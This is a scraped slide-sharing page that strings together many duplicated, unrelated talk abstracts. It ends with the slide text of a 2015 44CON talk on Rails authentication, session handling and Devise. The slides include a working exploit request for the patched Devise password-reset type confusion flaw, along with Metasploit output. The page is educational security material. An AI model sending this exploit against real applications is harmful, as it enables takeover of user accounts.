This document provides an overview of authentication and authorization in Ruby on Rails applications. It discusses how Rails handles authentication and authorization out of the box, as well as common gems used to add these capabilities like Devise and CanCan. It also covers topics like session management, password resets, and potential security issues to consider like the password reset type confusion vulnerability.
The Recording HTTP Proxy: Not Yet Another Messiah - Bulgaria PHP 2019Viktor Todorov
In our work we tend to believe in Messiah. A messiah can be the new magic tool which will solve all our problems, or a shiny framework, so much better than everything we have used before, or even a person in our team. We all know the messiah in software testing. It’s the Unit Testing. But is the unit test the one and the only way to test a software? The answer is no. This lecture will show you a new approach to software testing using a Recording HTTP Proxy and how it can help you achieve better quality of your software. Without proclaiming it as “The Great New Messiah”.
A brief introduction to using Apache Solr for implementing search for your website.
Download the ppt to see comments which add more detail.
Presented at eBig Java SIG, Oakland, CA. June 2008
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
Although web application firewall (WAF) solutions are very useful to prevent common or automated attacks, most of them are based on blacklist approaches and are still far from perfect. This talk illustrates a number of creative techniques to smuggle and reshape HTTP requests using the strange behaviour of web servers and features such as request encoding or HTTP pipelining. These methods can come in handy when testing a website behind a WAF and can help penetration testers and bug bounty hunters to avoid drama and pain! Knowing these techniques is also beneficial for the defence team in order to design appropriate mitigation techniques. Additionally, it shows why developers should not solely rely on WAFs as the defence mechanism.
Finally, an open source Burp Suite extension will be introduced that can be used to assess or bypass a WAF solution using some of the techniques discussed in this talk. The plan is to keep improving this extension with the help of the http.ninja project.
The Recording HTTP Proxy: Not Yet Another Messiah - Bulgaria PHP 2019Viktor Todorov
In our work we tend to believe in Messiah. A messiah can be the new magic tool which will solve all our problems, or a shiny framework, so much better than everything we have used before, or even a person in our team. We all know the messiah in software testing. It’s the Unit Testing. But is the unit test the one and the only way to test a software? The answer is no. This lecture will show you a new approach to software testing using a Recording HTTP Proxy and how it can help you achieve better quality of your software. Without proclaiming it as “The Great New Messiah”.
A brief introduction to using Apache Solr for implementing search for your website.
Download the ppt to see comments which add more detail.
Presented at eBig Java SIG, Oakland, CA. June 2008
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
Although web application firewall (WAF) solutions are very useful to prevent common or automated attacks, most of them are based on blacklist approaches and are still far from perfect. This talk illustrates a number of creative techniques to smuggle and reshape HTTP requests using the strange behaviour of web servers and features such as request encoding or HTTP pipelining. These methods can come in handy when testing a website behind a WAF and can help penetration testers and bug bounty hunters to avoid drama and pain! Knowing these techniques is also beneficial for the defence team in order to design appropriate mitigation techniques. Additionally, it shows why developers should not solely rely on WAFs as the defence mechanism.
Finally, an open source Burp Suite extension will be introduced that can be used to assess or bypass a WAF solution using some of the techniques discussed in this talk. The plan is to keep improving this extension with the help of the http.ninja project.
Building Realtime Apps with Ember.js and WebSocketsBen Limmer
This talk discusses how AJAX differs from WebSockets and how the technology can be used to implement rich real-time experiences. It also produces a live demo using EmberJS.
200, 404, 302. Is it a lock combination? A phone number? No, they're HTTP status codes! As we develop Web applications, we encounter these status codes and others, and often we make decisions about which ones to return without giving much thought to their meaning or context. It's time to take a deeper look at HTTP. Knowing the methods, headers, and status codes, what they mean, and how to use them can help you develop richer Internet applications. Join Ben Ramsey as he takes you on a journey through RFC 2616 to discover some of the gems of HTTP.
200, 404, 302. Is it a lock combination? A phone number? No, they're HTTP status codes! As we develop Web applications, we encounter these status codes and others, and often we make decisions about which ones to return without giving much thought to their meaning or context. It's time to take a deeper look at HTTP. Knowing the methods, headers, and status codes, what they mean, and how to use them can help you develop richer Internet applications. Join Ben Ramsey as he takes you on a journey through RFC 2616 to discover some of the gems of HTTP.
The Servlet 3.1 Async I/O API was released into the wild more than a year ago and is a significantly different animal than the JVM's async NIO or NIO2.
The implementers of Jetty are your experienced guides in discovering the design of these new APIs, their performance and scalability features, and the common pitfalls in their usage.
Building Realtime Apps with Ember.js and WebSocketsBen Limmer
This talk discusses how AJAX differs from WebSockets and how the technology can be used to implement rich real-time experiences. It also produces a live demo using EmberJS.
200, 404, 302. Is it a lock combination? A phone number? No, they're HTTP status codes! As we develop Web applications, we encounter these status codes and others, and often we make decisions about which ones to return without giving much thought to their meaning or context. It's time to take a deeper look at HTTP. Knowing the methods, headers, and status codes, what they mean, and how to use them can help you develop richer Internet applications. Join Ben Ramsey as he takes you on a journey through RFC 2616 to discover some of the gems of HTTP.
200, 404, 302. Is it a lock combination? A phone number? No, they're HTTP status codes! As we develop Web applications, we encounter these status codes and others, and often we make decisions about which ones to return without giving much thought to their meaning or context. It's time to take a deeper look at HTTP. Knowing the methods, headers, and status codes, what they mean, and how to use them can help you develop richer Internet applications. Join Ben Ramsey as he takes you on a journey through RFC 2616 to discover some of the gems of HTTP.
The Servlet 3.1 Async I/O API was released into the wild more than a year ago and is a significantly different animal than the JVM's async NIO or NIO2.
The implementers of Jetty are your experienced guides in discovering the design of these new APIs, their performance and scalability features, and the common pitfalls in their usage.
Wiremock es una herramienta para convertir servicios HTTP en mock y así poder testear tu código aislándolo de servicios HTTP (como servicios Rest).
Slides de apoyo a la charla sobre la herramienta en el Open South Code de 2016 en Málaga (España)
Hunting for APT in network logs workshop presentationOlehLevytskyi1
Nonamecon 2021 presentation.
Network logs are one of the most efficient sources to hunt adversaries, but building good analytics capabilities require a deep understanding of benign activity and attacker behavior. This training focuses on detecting real-case attacks, tools and scenarios by the past year.
The training is highly interactive and retains a good balance between theory and a lot of hands-on exercises for the students to get used to the detection engineering methodology and prepare them to start implementing this at their organizations.
Presentation topics:
- Netflow Mitre Matrix view
- Full packet captures vs Netflow
- Zeek
- Zeek packages
- RDP initial comprometation
- Empire Powershell and CobaltStrike or what to expect after initial loader execution.
- Empire powershell initial connection
- Beaconing. RITA
- Scanning detection
- Internal enumeration detection
- Lateral movement techniques widely used
- Kerberos attacks
- PSExec and fileless ways of delivering payloads in the network
- Zerologon detection
- Data exfiltration
- Data exfiltration over C2 channel
- Data exfiltration using time size limits (data chunks)
- DNS exfiltration
- Detecting ransomware in your network
- Real incident investigation
Authors:
Oleh Levytskyi (https://twitter.com/LeOleg97)
Bogdan Vennyk (https://twitter.com/bogdanvennyk)
In theory, post-exploitation after having remote access is easy. Also in theory, there is no difference between theory and practice. In practice, there is. Imagine a scenario, where you have deployed a malware on a user’s workstation, but the target information is on a secure server accessed via two-factor authentication, with screen access only (e.g. RDP, Citrix, etc.). On top of that, the server runs application white-listing, and only the inbound port to the screen server (e.g. 3389) is allowed through the hardware firewall. But you also need persistent interactive C&C communication (e.g. Netcat, Meterpreter, RAT) to this server through the user’s workstation.
I developed (and will publish) two tools that help you in these situations. The first tool can drop malware to the server through the screen while the user is logged in. The second tool can help you to circumvent the hardware firewall after we can execute code on the server with admin privileges (using a signed kernel driver). My tools are generic meaning that they work against Windows server 2012 and Windows 8, and they work with RDP or other remote desktops. The number of problems you can solve with them are endless, e.g., communicating with bind-shell on webserver behind restricted DMZ. Beware, live demo and fun included!
The Internet of Things if growing, but how can you build your own connected objects?
Together with MQTT, CoAP is one of the popular IoT protocols. It provides answers to the typical IoT constraints: it is bandwidth efficient and fits in constrained embedded environment while providing friendly and discoverable RESTful API.
This tutorial aims at giving you a hands-on experience with CoAP by showing you the power and simplicity of the Eclipse Californium library for developing real world IoT application.
Agenda:
- Introduction to CoAP
- Live discovery of connected CoAP objects using the Copper plugin for Firefox
- Presentation of more advanced CoAP topics (proxy, resource directory, device management with LWM2M)
- Presentation of Eclipse Californium, a CoAP library for Java
- Exercise: complete the provided Java code to create your own Internet of Things... thing!
As presented at Hackfest 2015 Quebec City, November 7th 2015.
This session will focus on real world deployments of DDoS mitigation strategies in every layer of the network. It will give an overview of methods to prevent these attacks and best practices on how to provide protection in complex cloud platforms. The session will also outline what we have found in our experience managing and running thousands of Linux and Unix managed service platforms and what specifically can be done to offer protection at every layer. The session will offer insight and examples from both a business and technical perspective.
They're All Scorpions - Successful SecOps in a Hostile Workplace - Pete Herzo...44CON
Your job is to secure operations. But nobody listens to you. There’s no budget. Management keeps making bad security decisions that seem to sabotage your efforts. Do you flee or do you try harder? The security books, blogs, and tweeting pundits out there tell us we need to learn the language of business. We need to put risk in terms of money that management understands. We need to be like the management we’re trying to protect. And that’s where it all falls apart. The security to business relationship is often textbook abusive codependency. You do well and nobody notices. You fail and you get fired or worse- shamed by your peers over social media for whatever the company releases as the statement for the breach. So how do you do SecOps under those conditions? This talk will focus on new ways to approach SecOps to face the challenges you have today with business demands. We will look at new security research that will make a difference for how you do your job. Most of all we will show you technical security practices to help you sustain your new found stance.
How to Explain Post-Quantum Cryptography to a Middle School Student - Klaus S...44CON
One of the hottest topics in current crypto research is Post-Quantum Cryptography. This branch of cryptography addresses asymmetric crypto systems that are not prone to quantum computers.
Virtually all asymmetric crypto systems currently in use (Diffie-Hellman, RSA, DSA, and Elliptic Curve Crypto Systems) are not Post-Quantum. They will be useless, once advanced quantum computers will be available. Quantum computer technology has made considerable progress in recent years, with major organisations, like Google, NSA, and NASA, investing in it.
Post-Quantum Cryptography uses advanced mathematical concepts. Even if one knows the basics of current asymmetric cryptography (integer factorisation, discrete logarithms, …), Post-Quantum algorithms are hard to understand.
The goal of this presentation is to explain Post-Quantum Cryptography in a way that is comprehensible for non-mathematicians. Five families of crypto systems (as good as all known Post-Quantum algorithms belong to these) will be introduced:
Lattice-based systems:
The concept of lattice-based asymmetric encryption will be explained with a two-dimensional grid (real-world implementations use 250 dimensions and more). Some lattice-based ciphers (e.g., New Hope) make use of the Learning with Error (LWE) concept. I will demonstrate LWE encryption in a way that is understandable to somebody who knows Gaussian elimination (this is taught at middle school). Other lattice-based systems (especially NTRU) use truncated polynomials, which I will also explain in a simple way.
Code-based systems:
McEliece and a few other asymmetric ciphers are based on error correction codes. While teaching the whole McEliece algorithm might be too complex for a 44CON presentation, it is certainly possible to explain error correction codes and the main McEliece fundamentals.
Non-commutative systems:
There are nice ways to explain non-commutative groups and the crypto systems based on these, using everyday-life examples. Especially, twisting a Rubik’s Cube and plaiting a braid are easy-to-understand group operations a crypto system can be built on.
Multivariate systems:
Multivariate crypto can be explained to somebody who knows Gaussian elimination.
Hash-based signatures: If properly explained, Hash-based signatures are easier to understand than any other asymmetric crypto scheme.
I will explain these systems with cartoons, drawings, photographs, a Rubik’s Cube and other items.
In addition, I will give a short introduction to quantum computers and the current Post-Quantum Crypto Competition (organised by US authority NIST).
Using SmartNICs to Provide Better Data Center Security - Jack Matheson - 44CO...44CON
Data Center security has been forced to reinvent itself as software complexity increases, networking capabilities grow more agile, and attack complexity turns unmanageable. With this change, the need for security policy enforcement to be handled at the edge has pushed functionality onto host compute systems, resulting in inherent performance loss and security weakness due to consolidation of resources.
In the first part of the talk we will be presenting a SmartNIC-based model for data-center security that solves both the performance problem and the security problems of edge-centric policy models. The model features a more robust isolation of responsibilities, superior offload capabilities, significantly better scaling of policy, and unique visibility opportunities.
To illustrate this, we present a SmartNIC-based reference architecture for network layout, as well as examples of SmartNIC security controls and their resulting threat models.
The second part of the talk will unveil a new innovative technique for tamper proof host introspection as SmartNICs are in a unique position to analyze and inspect the memory of the host to which they are attached. Normally, this functionality is reserved for a hypervisor, where it is known as ‘guest introspection’ or ‘virtual-machine introspection’. With host introspection, security controls no longer live in the hypervisor, but on the SmartNIC itself, on a separate trust domain. In this way, the visibility normally achieved with guest introspection can be performed for the entire host memory in an isolated and secure area. In order for host introspection to work in the same way as guest introspection, memory is DMA transferred in bursts over the PCI-e bus that attaches the SmartNIC to the host. As this method can be subverted to hide unwanted software, we will demonstrate a novel approach to tamper proof the acquisition of memory and for performing live introspection.
Host introspection complements the network controls implemented using the SmartNIC by enabling the measurement of the integrity and the behavior of workloads (virtual machines, containers, bare metal servers) to identify possible indicators of compromise. The visibility and context gained also enhances the granularity of network controls, resulting in measurably better security for the data center compared to traditional software-only based controls.
JARVIS never saw it coming: Hacking machine learning (ML) in speech, text and...44CON
Exploits, Backdoors, and Hacks: words we do not commonly hear when speaking of Machine Learning (ML). In this talk, I will present the relatively new field of hacking and manipulate machine learning systems and the potential these techniques pose for active offensive research.
The study of Adversarial ML allows us to leverage the techniques used by these algorithms to find weak points and exploit them in order to achieve:
Unexpected consequences (why did it decide this rifle is a banana?)
Data leakage (how did they know Joe has diabetes)
Memory corruption and other exploitation techniques (boom! RCE)
Influence the output
In other words, while ML is great at identifying and classifying patterns, an attacker can take advantage of this and take control of the system.
This talk is an extension of research made by many people, including presenters at DefCon, CCC, and others – a live demo will be shown on stage!
Garbage In, RCE Out :)
Reverse Engineering and Bug Hunting on KMDF Drivers - Enrique Nissim - 44CON ...44CON
Numerous technical articles, presentations, and even books exists about reverse engineering the Windows Driver Model (WDM) for purposes that vary from simply understanding how a specific driver works, to malware analysis and bug hunting. On the other hand, Microsoft has been providing the Kernel Mode Driver Framework (KMDF) for quite a while and we now see more and more drivers shifting to this framework instead of interacting directly with the OS like in the old WDM times. Yet, there is close to no information on how to approach this model from a reverse engineering and offensive standpoint.
In this presentation, I will first do a quick recap on WDM drivers, its common structures, and how to identify its entry points. Then I’ll introduce KMDF with all its relevant functions for reverse engineering through a set of case-studies. I’ll describe how to interact with a KMDF device object through SetupDI api and how to find and analyze the different IO queues dispatch routines. Does the framework actually enhances security? We’ll come to a conclusion after revealing some major vendor implementation problems.
Armed with this knowledge, you will be able to run your own bug hunting session over any KMDF driver.
The UK's Code of Practice for Security in Consumer IoT Products and Services ...44CON
In March 2018, the UK launched its Secure by Design report in order to help defend against security threats, especially for consumer Internet of Things products and services. Over the past few years, poorly secured IoT devices have been hijacked in both targeted as well as large-scale DDoS attacks such as Mirai. In addition to this, poor security can threaten both privacy and safety.
The speaker, David Rogers authored the UK’s ‘Code of Practice for Security in Consumer IoT Products and Associated Services’, in collaboration with DCMS, NCSC, ICO and industry colleagues with extensive support from the security research community. David will discuss the guidelines within the Code of Practice, why these were prioritised and why the top three became dealing with the password problem, implementing vulnerability disclosure and acting on it and addressing software updates. David will also look at what’s next: what will the challenges be and will the Code of Practice succeed in its aims? How can IoT products possibly be certified and how will the threat landscape change in response to improving security?
Weak analogies make poor realities – are we sitting on a Security Debt Crisis...44CON
Cyber Security is often framed in terms of ‘Risk’- the possibility of suffering harm or loss – and the ‘Management’ of Risk to reduce uncertainty. This is familiar territory for businesses. Cyber Security falls in neatly under Risk Management, is assigned a suitable place on the organigramme, tossed some spare budget and granted a few paragraphs in the board report. NIST defines Risk as a ‘function of the likelihood of a given threat-source’s exercising a particular potential vulnerability, and the resulting impact of that adverse event on the organisation’.
Key theme:
This presentation explores the idea that making cyber security analogous to risk is holding us back. How about we talk about security ‘debt’ instead? Technical Debt is already a well understood concept in software development – the cost of additional rework caused by choosing an easy solution now instead of using a better approach that would take longer or cost more. Changing our language changes how we think and how we behave. This presentation argues that such a change could have a significant impact on software security.
In this presentation we will comment on the power of ‘analogies’ and how they’ve shaped our industry. We’ll then consider the difference between the ‘security as risk’ and the ‘security as debt’ paradigms and explore how changing paradigms may change the way we think about, talk about and measure software security. We believe this could have a very empowering effect on development managers and other security professionals who are struggling to articulate the relative benefits of security (or a lack of security) to a software product.
Con speakers fear the Nerf gun. Overrun your talk time at your peril; Steve will shoot your arse with extreme prejudice until you STFU. We had to find a way to pwn the gun and shoot him back.
That’s when we found the Nerf Terrascout: a remote tank gun controlled over 2.4GHz, with a video feed to the remote, complete with crosshairs.
At first, we thought this would be a trivial job: figure out the RF and take control. It turned in to a mammoth hardware, firmware and RF reversing project.
This puppy is so over-specced it would drive you to tears.
The talk will cover the fails, hair loss and eventual success. There won’t be any smart dildos in it, though some of the techniques used are equally suited to teledildonics exploitation, if that’s your thing.
Reversing RF in a high frequency environment using SDRs is challenging. We’ll discuss how we worked around these issues using hardware reversing skills.
We had to import hardware from China for this project, which we could then programme ourselves using SPI, impersonate the legitimate controller and ‘jack the tank gun.
This talk will of course include a live demonstration of hijacking the tank gun and (possibly) shooting Steve.
Security module for php7 – Killing bugclasses and virtual-patching the rest! ...44CON
Presented by: Julien Voisin and Thibault Koechlin
Suhosin is a great PHP module, but unfortunately, it’s getting old, new ways have been found to compromise PHP applications, and some aren’t working anymore; and it doesn’t play well with the shiny new PHP 7. As a secure web-hosting company, we needed a reliable and future-proof solution to address the flow of new vulnerabilities that are published every day. This is why we developed Snuffleupagus, a new (and open-source!) PHP security module, that provides several features that we needed: passively killing several PHP-specific bug classes, but also implementing virtual-patching at the PHP level, allowing to patch vulnerabilities in a precise, false-positive-free, ultra-low overhead way, without even touching the applications’ code.
Elevating Tactical DDD Patterns Through Object CalisthenicsDorra BARTAGUIZ
After immersing yourself in the blue book and its red counterpart, attending DDD-focused conferences, and applying tactical patterns, you're left with a crucial question: How do I ensure my design is effective? Tactical patterns within Domain-Driven Design (DDD) serve as guiding principles for creating clear and manageable domain models. However, achieving success with these patterns requires additional guidance. Interestingly, we've observed that a set of constraints initially designed for training purposes remarkably aligns with effective pattern implementation, offering a more ‘mechanical’ approach. Let's explore together how Object Calisthenics can elevate the design of your tactical DDD patterns, offering concrete help for those venturing into DDD for the first time!
PHP Frameworks: I want to break free (IPC Berlin 2024)Ralf Eggert
In this presentation, we examine the challenges and limitations of relying too heavily on PHP frameworks in web development. We discuss the history of PHP and its frameworks to understand how this dependence has evolved. The focus will be on providing concrete tips and strategies to reduce reliance on these frameworks, based on real-world examples and practical considerations. The goal is to equip developers with the skills and knowledge to create more flexible and future-proof web applications. We'll explore the importance of maintaining autonomy in a rapidly changing tech landscape and how to make informed decisions in PHP development.
This talk is aimed at encouraging a more independent approach to using PHP frameworks, moving towards a more flexible and future-proof approach to PHP development.
The Art of the Pitch: WordPress Relationships and SalesLaura Byrne
Clients don’t know what they don’t know. What web solutions are right for them? How does WordPress come into the picture? How do you make sure you understand scope and timeline? What do you do if sometime changes?
All these questions and more will be explored as we talk about matching clients’ needs with what your agency offers without pulling teeth or pulling your hair out. Practical tips, and strategies for successful relationship building that leads to closing the deal.
Transcript: Selling digital books in 2024: Insights from industry leaders - T...BookNet Canada
The publishing industry has been selling digital audiobooks and ebooks for over a decade and has found its groove. What’s changed? What has stayed the same? Where do we go from here? Join a group of leading sales peers from across the industry for a conversation about the lessons learned since the popularization of digital books, best practices, digital book supply chain management, and more.
Link to video recording: https://bnctechforum.ca/sessions/selling-digital-books-in-2024-insights-from-industry-leaders/
Presented by BookNet Canada on May 28, 2024, with support from the Department of Canadian Heritage.
Securing your Kubernetes cluster_ a step-by-step guide to success !KatiaHIMEUR1
Today, after several years of existence, an extremely active community and an ultra-dynamic ecosystem, Kubernetes has established itself as the de facto standard in container orchestration. Thanks to a wide range of managed services, it has never been so easy to set up a ready-to-use Kubernetes cluster.
However, this ease of use means that the subject of security in Kubernetes is often left for later, or even neglected. This exposes companies to significant risks.
In this talk, I'll show you step-by-step how to secure your Kubernetes cluster for greater peace of mind and reliability.
Accelerate your Kubernetes clusters with Varnish CachingThijs Feryn
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Ramesh Iyer
In today's fast-changing business world, Companies that adapt and embrace new ideas often need help to keep up with the competition. However, fostering a culture of innovation takes much work. It takes vision, leadership and willingness to take risks in the right proportion. Sachin Dev Duggal, co-founder of Builder.ai, has perfected the art of this balance, creating a company culture where creativity and growth are nurtured at each stage.
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf91mobiles
91mobiles recently conducted a Smart TV Buyer Insights Survey in which we asked over 3,000 respondents about the TV they own, aspects they look at on a new TV, and their TV buying preferences.
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...UiPathCommunity
💥 Speed, accuracy, and scaling – discover the superpowers of GenAI in action with UiPath Document Understanding and Communications Mining™:
See how to accelerate model training and optimize model performance with active learning
Learn about the latest enhancements to out-of-the-box document processing – with little to no training required
Get an exclusive demo of the new family of UiPath LLMs – GenAI models specialized for processing different types of documents and messages
This is a hands-on session specifically designed for automation developers and AI enthusiasts seeking to enhance their knowledge in leveraging the latest intelligent document processing capabilities offered by UiPath.
Speakers:
👨🏫 Andras Palfi, Senior Product Manager, UiPath
👩🏫 Lenka Dulovicova, Product Program Manager, UiPath
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
44CON London 2015 - Going AUTH the Rails on a Crazy Train
1. Going AUTH the Rails on a Crazy Train
Tomek Rabczak
@sigdroid
Jeff Jarmoc
@jjarmoc September, 2015
2. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Who we are
Tomek Rabczak
Senior Security Consultant with NCC Group
Ex-Rails Maker turned Rails Breaker
Jeff Jarmoc
Senior Security Consultant with NCC Group
Occasional contributor to Metasploit, Brakeman
NCC Group
UK Headquarters, Worldwide Offices
Software Escrow, Testing, Domain Services
2
3. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
All Aboard, hahaha!
1. Rails Introduction
2. Authentication
3. Authorization
4. Boilerman: A New Dynamic Analysis Tool
3
4. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
`rails new sample_app`
sample_app
app/
models/
views/
controllers/
4
Root directory
Application files (Your code)
Models (Objects, usually backed by DB)
Views (Output presentation templates)
Controllers (Ties Models and Views with Actions)
Configuration files directory
Maps URLs to Controller Actions
Dependency record of Gem requirements
Specific versions of currently installed Gems
…
config/
routes.rb
…
Gemfile
Gemfile.lock
5. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
The ‘Rails Way’
5
ActiveRecord (Model)
SQLi protection via ORM-managed queries (see http://rails-sqli.org/)
ActionView (View)
XSS protection via default HTML-output encoding
ActionController (Controller)
CSRF protections via protect_from_forgery
6. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Goin’ off the Rails
Authentication (AUTHN)
Who is the user?
Only HTTP Basic & Digest natively
Authorization (AUTHZ)
What can they do?
No native facility
6
7. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Laying More Track - AUTHN
Option 1 - Roll your own
Re-invents the wheel, risks common
mistakes
Lots more to AUTHN than checking/
storing passwords
has_secure_password in >= 3.1
helps
7
8. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Laying More Track - AUTHN
8
Option 2 - Use a gem
Vulnerabilities are far-reaching
Ongoing updates/maintenance required
Integration can be tricky
Core code is generally well vetted
Encapsulates past community experience
9. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Common AUTHN Gems
Devise
Most popular, built on Warden
OmniAuth
Multi-Provider, OAuth focused
DoorKeeper
OAuth2 provider for Rails
AuthLogic
Adds a new model blending Sessions w/ Auth
9
10. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Arguments for writing
“For one, practical experience shows that authentication on
most sites requires extensive customization,
and modifying a third-party product is often
more work than writing the system from scratch. In addition,
off-the-shelf systems can be “black boxes”,
with potentially mysterious innards; when you write your own
system, you are far more likely to understand it.”
10
https://www.railstutorial.org/book/modeling_users#sec-adding_a_secure_password
11. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Write our own
11
http://api.rubyonrails.org/v3.1.0/classes/ActiveModel/SecurePassword/ClassMethods.html
http://chargen.matasano.com/chargen/2015/3/26/enough-with-the-salts-updates-on-secure-password-schemes.html
Digests stored with BCrypt
Schema: User(name:string, password_digest:string)
12. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Lots more needed.
Storing Creds and Authenticating is just the start
#TODO
Session management
Complexity requirements
Lost/Forgotten Password handling
API Tokens / MFA / 2FA / OAUTH
12
13. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Session Management
1. Exchange credentials for a token
(cookie).
2. Identify user by that token on
subsequent requests.
3. Invalidate that token when needed.
Logout or Timeout
4. Where we store session state varies
13
14. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Encrypted Cookie Sessions
14
ozzy@ozzy.com
*********
15. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Database Sessions
15
ozzy@ozzy.com
*********
16. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Database vs. Cookies
16
Database Cookie
User Cookie Random Token Encrypted Serialized Session Object
Revocation
Maximum Lifetime (Config)
One Concurrent
Delete From DB
Maximum Lifetime (Config)
Unlimited Concurrent
Attack Surface Theft / Enumeration
Theft / Enumeration
Cryptographic Attacks
Long/Infinite Lived Sessions
Encryption Key Exposure
*Deserialization Vulns
Per-Request Overhead
DB query
(caching may help)
Signature Validation
Decryption
Deserialization
17. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Session Type Config
config/initializers/session_store.rb:
Rails.application.config.session_store :cookie_store,
key: ‘_session_cookie_name’,
:expire_after => 2.hours
17
or
:active_record_store
Session Expiry Time Must be Manually Configured!
18. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Cookie Session Config
18
config/secrets.yml:
production:
secret_key_base: 'secret key’
Signed, Not Encrypted!
production:
secret_token: 'secret key'
config/initializer/session_store.rb:
Rails.application.config.action_dispatch.cookies_serializer = :json
RCE w/ Key Exposure!
:marshal
or
:hybrid
19. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Lost/Forgotten Passwords
Password Hints
Change and email PW
“Secret” Questions
19
CAUTION
20. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Lost/Forgotten Passwords
20
1) Generate CSPRNG token => User object w/ timestamp
2) Transmit to user out of band (email, SMS, etc)
3) User visits site w/ token
4) User.find_by_token(), verify expiration, change password
5) Delete Token
GOOD
21. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Installing Devise
Gemfile
gem 'devise'
Commands
rails generate devise:install
rails generate devise User
Config
Initializer: config/initializers/devise.rb
ActionMailer: config/environments/<environment>.rb
Initialize Database
rake db:migrate
21
22. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
app/models/User.rb
22
23. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Routes
23
app/config/routes.rb:
devise_for :users
24. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Using Devise
Controller Filter
before_action :authenticate_user!
Often put in ApplicationController
Skip where anonymous access needed
Helpers
user_signed_in?
current_user
user_session
24
25. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Devise Security History
Unreleased/HEAD
Optionally send password change notifications
3.5.1
Remove active tokens on email/password change
3.1.2
Addresses an email enumeration bug
3.1.0
Stores HMAC of tokens, instead of plain-text token
3.0.1
Fixes CSRF Token Fixation
2.2.3
Fixes a type confusion vulnerability
25
Disclosed by @joernchen of Phenoelit
Feb 5th, 2013
http://www.phenoelit.org/blog/archives/2013/02/05/
mysql_madness_and_rails/
26. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Devise Password Reset
Pseudo-Code
26
27. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
MySQL Equality
27
mysql> select "foo" from dual where 1="1string";
+-‐-‐-‐-‐-‐+
| foo |
+-‐-‐-‐-‐-‐+
| foo |
+-‐-‐-‐-‐-‐+
1 row in set, 1 warning (0.00 sec)
mysql> select "foo" from dual where 0="string";
+-‐-‐-‐-‐-‐+
| foo |
+-‐-‐-‐-‐-‐+
| foo |
+-‐-‐-‐-‐-‐+
1 row in set, 1 warning (0.00 sec)
28. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Exploiting in Rails
params[]
A hash of (usually) strings containing values of user-supplied parameters
28
Like this
/example?foo=bar&fizz=buzz
params => {"foo"=>"bar", “fizz"=>"buzz"}
/example?foo=1&fizz=2
params => {"foo"=>"1", "fizz"=>"2"}
29. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Exploiting in Rails
Rails Magic
XML (<4.0) and JSON (all versions) bodies parsed automatically
Typecast per those formats
29
Like this
POST /example HTTP/1.1
content-‐type: application/xml
<foo>bar</foo>
<fizz type=“integer”>1</fizz>
params => {"foo"=>"bar", “fizz"=>1}
30. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Devise Password Reset Exploit
How about this?
PUT /users/password HTTP/1.1
content-‐type: application/json
{"user":{
"password":"GAMEOVER",
"password_confirmation":"GAMEOVER",
“reset_password_token":0}
}
30
31. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Devise Password Reset Exploit
params[] =>
{"user"=>{"password"=>"GAMEOVER",
"password_confirmation"=>"GAMEOVER",
“reset_password_token”=>0}}
31
Query
User.find_by_token(0)
SELECT * from Users where token=0 limit 1;
Result
Resets password of first User with an outstanding token!
32. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Metasploit module
rails_devise_pass_reset.rb
Clears any outstanding tokens
Generates a token for a user of your choosing
Resets password to token of your choosing
Legitimate user *WILL* get emails
32
msf auxiliary(rails_devise_pass_reset) > exploit
[*] Clearing existing tokens...
[*] Generating reset token for admin@example.com...
[+] Reset token generated successfully
[*] Resetting password to "w00tw00t"...
[+] Password reset worked successfully
[*] Auxiliary module execution completed
33. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Password Reset Type Confusion
Patched in Devise
